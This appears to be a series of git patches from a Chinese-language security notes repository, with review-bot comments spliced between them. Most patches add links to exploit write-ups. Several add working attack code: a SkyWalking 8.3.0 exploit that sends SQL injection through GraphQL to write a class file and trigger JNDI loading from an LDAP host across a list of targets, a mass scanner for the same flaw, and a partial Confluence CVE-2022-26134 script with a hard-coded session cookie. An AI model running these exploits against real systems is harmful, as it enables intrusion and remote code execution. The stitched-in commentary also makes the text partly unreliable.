[struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** ++ 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** From a51b68438269f121c7fb2eaf7a63c3c457dbdbf2 Mon Sep 17 00:00:00 2001 
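Review bot: In Spring/Readme.md, the added explanation sentence (`原理就是默认情况下 ... 从而绕过`) describes how `.` behaves with and without `Pattern.DOTALL` but never says which of the two states the vulnerable matcher was in, so a reader cannot tell whether DOTALL is the cause or the fix. State explicitly that the bypass applies when the pattern is compiled without DOTALL and the request path contains a line terminator (the `/%0dadmin` example just above is the carriage-return case), and add the affected and fixed versions next to the CVE link. The embedded image also has only the generic alt text `image`; describe what the screenshot shows.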
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 4 Jun 2022 16:11:22 +0800 Subject: [PATCH 067/332] Update Readme.md --- Confluence/Readme.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Confluence/Readme.md b/Confluence/Readme.md index 70a6a80..b3e5090 100644 --- a/Confluence/Readme.md +++ b/Confluence/Readme.md @@ -6,6 +6,7 @@ + [CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP) + [CVE-2021-26084](https://github.com/h3v0x/CVE-2021-26084_Confluence) ++ [CVE-2022-26134](https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/) ## 漏洞分析 + [Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析](https://xz.aliyun.com/t/10736) From 8faadaf33c411f12fb539e8dd113f0fb7efbe079 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 4 Jun 2022 16:12:18 +0800 Subject: [PATCH 068/332] Create CVE-2022-26134.py --- Confluence/CVE-2022-26134.py | 114 +++++++++++++++++++++++++++++++++++ 1 file changed, 114 insertions(+) create mode 100644 Confluence/CVE-2022-26134.py diff --git a/Confluence/CVE-2022-26134.py b/Confluence/CVE-2022-26134.py new file mode 100644 index 0000000..4b3ee09 --- /dev/null +++ b/Confluence/CVE-2022-26134.py 
@@ -0,0 +1,114 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import argparse +import re +import requests +import urllib3 + +# https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# 利用脚本 +result = [] # 结果 + + +# 添加 +endpoints = [ +] + + +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454', + 'X-Forwarded-For': '127.0.0.1', + 'X-Client-IP': '127.0.0.1', + 'X-Remote-IP': '127.0.0.1', + 'X-Remote-Addr': '127.0.0.1', + 'X-Originating-IP': '127.0.0.1', +} + +proxy = { + # 'http': '127.0.0.1:8080' +} + + +def check_target_version(host, socket_proxies): + try: + response = requests.get("{}/login.action".format(host),headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False) + if response.status_code == 200: + filter_version = re.findall(".*", response.text) + if (len(filter_version) >= 1): + version = filter_version[0].split("'>")[1].split(' Date: Sun, 5 Jun 2022 21:14:27 +0800 Subject: [PATCH 069/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 4ccb632..5f745e5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -132,3 +132,4 @@ + 2022/05/17 [CobaltStrike二次开发](https://www.geekby.site/2020/12/cs%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91) **大哥说适合基本上全部的二次开发的使用** + 2022/05/20 [struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** + 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** ++ 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** From 8fbf0f68495238bb0a92fa91bc6be3ba3f0e7b50 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 6 Jun 2022 00:46:16 +0800 Subject: [PATCH 070/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 5f745e5..1639ea4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -133,3 +133,4 @@ + 2022/05/20 [struts2绕过waf读写文件及另类方式执行命令](https://mp.weixin.qq.com/s/outtxUANOa406ErGleWjtQ) **说不定之后会遇到。** + 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** + 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** ++ 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) From 4c2010f3ddf84be130f6727b3c87eca36d09db35 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 6 Jun 2022 10:56:53 +0800 Subject: [PATCH 071/332] Update Readme.md --- Confluence/Readme.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Confluence/Readme.md b/Confluence/Readme.md index b3e5090..ce8e338 100644 --- a/Confluence/Readme.md +++ b/Confluence/Readme.md @@ -10,3 +10,4 @@ ## 漏洞分析 + [Confluence CVE-2019-3396 & CVE-2021-26084漏洞分析](https://xz.aliyun.com/t/10736) ++ [【下篇】CVE-2022-26134 Confluence 多种通用型绕过沙箱姿势可实现命令回显](https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247490397&idx=1&sn=f5a7394b80f4ba690e967cb5daf8c9e0&chksm=cefda249f98a2b5f6ec4970dde26392bf43b037ae9fbe9241141aaaa5185958c484dc8522403&mpshare=1&scene=23&srcid=0606Xdmz2f953rcByqNR2SFV&sharer_sharetime=1654481651804&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 4870417220acff50208f70f750e716199804990b Mon Sep 17 00:00:00 2001 
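Review bot: In Confluence/CVE-2022-26134.py, the module-level `headers` dict commits a literal session cookie (`'Cookie': 'ADMINCONSOLESESSION=...'`) together with five client-address headers pinned to `127.0.0.1` (X-Forwarded-For, X-Client-IP, X-Remote-IP, X-Remote-Addr, X-Originating-IP). A session token does not belong in a tracked file whether or not it is still valid; remove it or read it from the environment, and document why the address headers are sent. Smaller points in the same preamble: `# -*- coding: utf-8 -*` is missing its closing `-*-`, `# /usr/bin/python3` lacks the `!` and is therefore a plain comment rather than a shebang, `endpoints` is committed empty under a bare `# 添加` comment, and `check_target_version` passes `verify=False` while the certificate warning is suppressed globally, which should at least be a documented opt-in.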
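Review bot: In Confluence/Readme.md, the added `【下篇】CVE-2022-26134` link keeps the WeChat share-tracking query parameters (`mpshare`, `scene`, `srcid`, `sharer_sharetime`, `sharer_shareid`) and the `#rd` fragment. The `sharer_shareid` value is identical in several other mp.weixin.qq.com links added in this series, so it ties every one of them to the same sharing account. Drop those parameters, or use the short `https://mp.weixin.qq.com/s/<id>` form that other entries in these Readme files already use.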
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 6 Jun 2022 12:08:23 +0800 Subject: [PATCH 072/332] Update Readme.md --- F5 big/Readme.md | 1 + 1 file changed, 1 insertion(+) diff --git a/F5 big/Readme.md b/F5 big/Readme.md index 5550bdd..cfc206f 100644 --- a/F5 big/Readme.md +++ b/F5 big/Readme.md @@ -25,3 +25,4 @@ Content-Length: 45 } ``` + [CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现](https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw) ++ [CVE-2022-1388:扩展攻击之文件写入](https://mp.weixin.qq.com/s?__biz=MzkwMzM2NDE5OQ==&mid=2247483731&idx=1&sn=6ac2832719258adbbcf718984558d2cb&chksm=c0962a5bf7e1a34daeb3cfbd92b3de27718aa372374b022e5d7f0ab0923e585012d7be7c429d&scene=132#wechat_redirect) **写入的地址/usr/local/www/** From dff147e25bd327ca4dcc0c22e41df46fe9f9e1cd Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Jun 2022 22:13:45 +0800 Subject: [PATCH 073/332] Create Readme.md --- SkyWalking/Readme.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 SkyWalking/Readme.md diff --git a/SkyWalking/Readme.md b/SkyWalking/Readme.md new file mode 100644 index 0000000..8ad9aa3 --- /dev/null +++ b/SkyWalking/Readme.md @@ -0,0 +1,12 @@ +# SkyWalking + + + +> Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。 + +## sql->RCE + +https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw + +https://github.com/vulhub/vulhub/blob/master/skywalking/8.3.0-sqli/README.zh-cn.md + From 956482234e1a30d357f58f42d07a4bdd3d9011e9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Jun 2022 22:15:25 +0800 Subject: [PATCH 074/332] Create exp.py --- SkyWalking/tool/exp.py | 62 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 SkyWalking/tool/exp.py diff --git a/SkyWalking/tool/exp.py b/SkyWalking/tool/exp.py new file mode 100644 index 0000000..a5a2272 --- /dev/null 
+++ b/SkyWalking/tool/exp.py 
@@ -0,0 +1,62 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky + +# https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw +# https://cloud.tencent.com/developer/article/1939867 + +import requests +import urllib3 + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + +burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", + "Origin": "http://192.168.18.240:8080", "Connection": "close", + "Referer": "http://192.168.18.240:8080/log"} + +payload = 'CAFEBABE000000.............' +ClassName = 'Evil' +JndiUrl = 'ldap://0.0.0.0:8888' + + +def exp(burp0_url): + burp0_json1 = {"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select file_write('"+payload+"','"+ClassName+".class'))a where 1=? or 1=? or 1=? 
--", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json1, verify=False, allow_redirects=False, timeout=2) + except: + pass + # 触发 + burp0_json2={"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','"+ClassName+"','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json2, verify=False, allow_redirects=False, timeout=2) + except: + pass + + +def jndi(burp0_url): + burp0_json = { + "query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", + "variables": {"condition": {"endpointId": "1", + "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','javax.naming.InitialContext','"+JndiUrl+"','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? 
--", + "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", + "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, allow_redirects=False, timeout=2) + except: + pass + + +def fileTarget(file): + with open(file) as url_txt: + urls = url_txt.readlines() + for url in urls: + url = url.replace('\n', '') + jndi(url+'/graphql') + + +if __name__ == '__main__': + fileTarget('vulip.txt') From 5f18a445c466da179edad54c0eb51077bf0e44df Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 8 Jun 2022 22:15:52 +0800 Subject: [PATCH 075/332] Create scan.py --- SkyWalking/tool/scan.py | 104 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 104 insertions(+) create mode 100644 SkyWalking/tool/scan.py diff --git a/SkyWalking/tool/scan.py b/SkyWalking/tool/scan.py new file mode 100644 index 0000000..77d860b --- /dev/null +++ b/SkyWalking/tool/scan.py 
@@ -0,0 +1,104 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import argparse +import threading +import requests +import urllib3 + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# 利用脚本 + +result = [] # 结果 + +info = 'Apache Skywalking 8.3.0 SQL Injection Vulnerability' + + +# 添加 +endpoints = [ + '/graphql', +] + + +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Content-Type': 'application/json', + 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454', + 'X-Forwarded-For': '127.0.0.1', + 'X-Client-IP': '127.0.0.1', + 'X-Remote-IP': '127.0.0.1', + 'X-Remote-Addr': '127.0.0.1', + 'X-Originating-IP': '127.0.0.1', +} + +proxy = { + 'http': '127.0.0.1:8080' +} + + +def save(result): + file = open('result.txt', 'w') + for line in result: + file.write(line + '\n') + file.close() + + +def Scan_http(url, socket_proxies): + FLAG = False + payload = { + "query": "query queryLogs($condition: LogQueryCondition) {\r\n queryLogs(condition: $condition) {\r\n total\r\n logs {\r\n serviceId\r\n serviceName\r\n isError\r\n content\r\n }\r\n }\r\n}\r\n", + "variables": {"condition": {"metricName": "sqli", "paging": {"pageSize": 10}, "state": "ALL"}}} + + for endpoint in endpoints: + try: + res = requests.post(url+endpoint, json=payload, headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False) + if "sqli" in res.text and res.status_code == 200: + FLAG=True + result.append(url+' 存在'+info) + print(url+'\033[1;31m存在'+info+'\033[0m') + break + except: + pass + if not FLAG: + print(url+"扫描完成不存在漏洞") + + +def fileTarget(file, socket_proxies): + with open(file) as url_txt: + urls = url_txt.readlines() + for url in urls: + url = url.replace('\n', '') + Scan_http(url, socket_proxies) + save(result) + + +def multiRun(file, 
socket_proxies): + t = threading.Thread(target=fileTarget, args=(file, socket_proxies)) + t.start() + t.join() + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description=info+'scanner') + parser.add_argument('-f', default=None, help='read target url from file') + parser.add_argument('-u', default=None, help='target url') + parser.add_argument('-proxy', default=None, help='-proxy socks5://0.0.0.0:8088') + args = parser.parse_args() + socket_proxies = None + if args.proxy: + socket_proxies = { + 'http': args.proxy + } + if args.u: + Scan_http(args.u, socket_proxies) + exit(0) + if args.f: + multiRun(args.f, socket_proxies) + exit(0) + else: + parser.print_help() + exit(0) From bafaa63dcc47e2e2bae562eb6d8982b70e0efc3a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Jun 2022 11:00:08 +0800 Subject: [PATCH 076/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1639ea4..486304a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -134,3 +134,4 @@ + 2022/05/30 [Shiro反序列化漏洞笔记五(对抗篇)](http://changxia3.com/2022/05/09/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E4%BA%94%EF%BC%88%E5%AF%B9%E6%8A%97%E7%AF%87%EF%BC%89/#0x1-%E5%89%8D%E8%A8%80) **里面很多trick 的bypass** + 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** + 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) ++ 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** From e7f45d6c353408c289bb56cf3d797671e13e524f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Jun 2022 11:16:08 +0800 Subject: [PATCH 077/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 486304a..94af294 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -135,3 +135,4 @@ + 2022/06/05 [精简JRE,打造无依赖的Java-ShellCode-Loader](https://mp.weixin.qq.com/s?__biz=Mzg2MTc1NDAxMA==&mid=2247483848&idx=1&sn=03ea03031d7f6f19c7848f3bb60267a3&chksm=ce13063df9648f2bfdc5dd39b230ba400af7fad8f9b87b292646e862b2c41bd3db2c34341443&mpshare=1&scene=23&srcid=0605Twg54SwL9UVJVuW0U9dE&sharer_sharetime=1654430144972&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **感觉不错 减少了执行java的成本** + 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) + 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** ++ 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** From 9f89c57ca7a377204b5b736b4c6303498e1c2f1a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 18 Jun 2022 23:10:07 +0800 Subject: [PATCH 078/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 94af294..b8f6a30 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -136,3 +136,4 @@ + 2022/06/06 [CVE-2020-7961 Liferay Portal 复现分析](https://www.programminghunter.com/article/5340663689/) + 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** + 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** ++ 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** From 3b199f945fb869f8cb3e7df63ea176b660697c4a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 22 Jun 2022 17:27:24 +0800 Subject: [PATCH 079/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b8f6a30..e06ff9a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -137,3 +137,4 @@ + 2022/06/12 [Identity Security Authentication Vulnerability](http://noahblog.360.cn/an-quan-ren-zheng-xiang-guan-lou-dong-wa-jue/) **权限绕过认证非常不错** + 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** + 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** ++ 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) From fd59cc19dcba105a9124ece08537db56131669b5 Mon Sep 17 00:00:00 2001 
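Review bot: In SkyWalking/tool/exp.py, the `__main__` block calls `fileTarget('vulip.txt')` unconditionally, which sends `jndi()` to every line of that file with no argument parsing, confirmation or scope check, and every `requests.post` sits inside a bare `except: pass`, so the script leaves no record of which hosts were contacted or what came back. Take the target explicitly on the command line as scan.py does, catch `requests.RequestException` and log it, and say in the header comment that the script is meant for the vulhub lab linked from SkyWalking/Readme.md. Also in this hunk: `burp0_headers` hard-codes `Origin` and `Referer` as `http://192.168.18.240:8080`, a leftover from the captured request, and `exp()` is defined but never called.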
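Review bot: In SkyWalking/tool/scan.py, `Scan_http` swallows every exception with `except: pass`, leaves `FLAG` false, and then prints `扫描完成不存在漏洞`, so a timeout (the limit is 2 seconds), a DNS failure or a TLS error is reported as "not vulnerable". Anyone using the output to decide whether a host needs patching gets a false all-clear; catch `requests.RequestException`, report the host as unreachable, and keep that state separate from a clean result. Also in this hunk: `multiRun` starts one thread and joins it immediately, so it is sequential despite its name; the module-level `proxy` dict is never used; and `save()` should open `result.txt` in a `with` block so the handle is closed on error.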
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Jun 2022 10:14:40 +0800 Subject: [PATCH 080/332] Update Readme.md --- "java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" index d69975f..722fd77 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Readme.md" @@ -2,6 +2,7 @@ >https://github.com/lufeirider/BypassShell/blob/master/JAVA/JAVA.md +>https://gosecure.github.io/template-injection-workshop/#0 + [FreeMarker模板注入](FreeMarker) 后缀名.ftl From 83bf9845180d808bcd8fc77b2e57169d66f014e1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Jun 2022 12:58:08 +0800 Subject: [PATCH 081/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e06ff9a..f55dbba 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -138,3 +138,4 @@ + 2022/06/12 [Blackhat 2021 议题详细分析—— FastJson 反序列化漏洞及在区块链应用中的渗透利用](http://noahblog.360.cn/blackhat-2021yi-ti-xiang-xi-fen-xi-fastjsonfan-xu-lie-hua-lou-dong-ji-zai-qu-kuai-lian-ying-yong-zhong-de-shen-tou-li-yong-2/) **扩大了利用** + 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** + 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) ++ 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** From 122d66a5e11cfd65e3746928fdc6b60d57d774e7 Mon Sep 17 00:00:00 2001 
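Review bot: In the java日常/Readme.md entry added for 2022/06/24, the bold remark spells the server name `tocmat`; it should read `tomcat`, matching the link title on the same line (`利用tomcat自动部署机制getshell`).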
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Jun 2022 13:12:45 +0800 Subject: [PATCH 082/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index f55dbba..a778fc9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -139,3 +139,4 @@ + 2022/06/18 [Java中的任意文件上传技巧](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) **bypass waf 文件上传** + 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) + 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** ++ 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** From 19f099d56bd1f458e15a6177638cfb8677a09011 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 25 Jun 2022 22:02:51 +0800 Subject: [PATCH 083/332] Update Readme.md --- 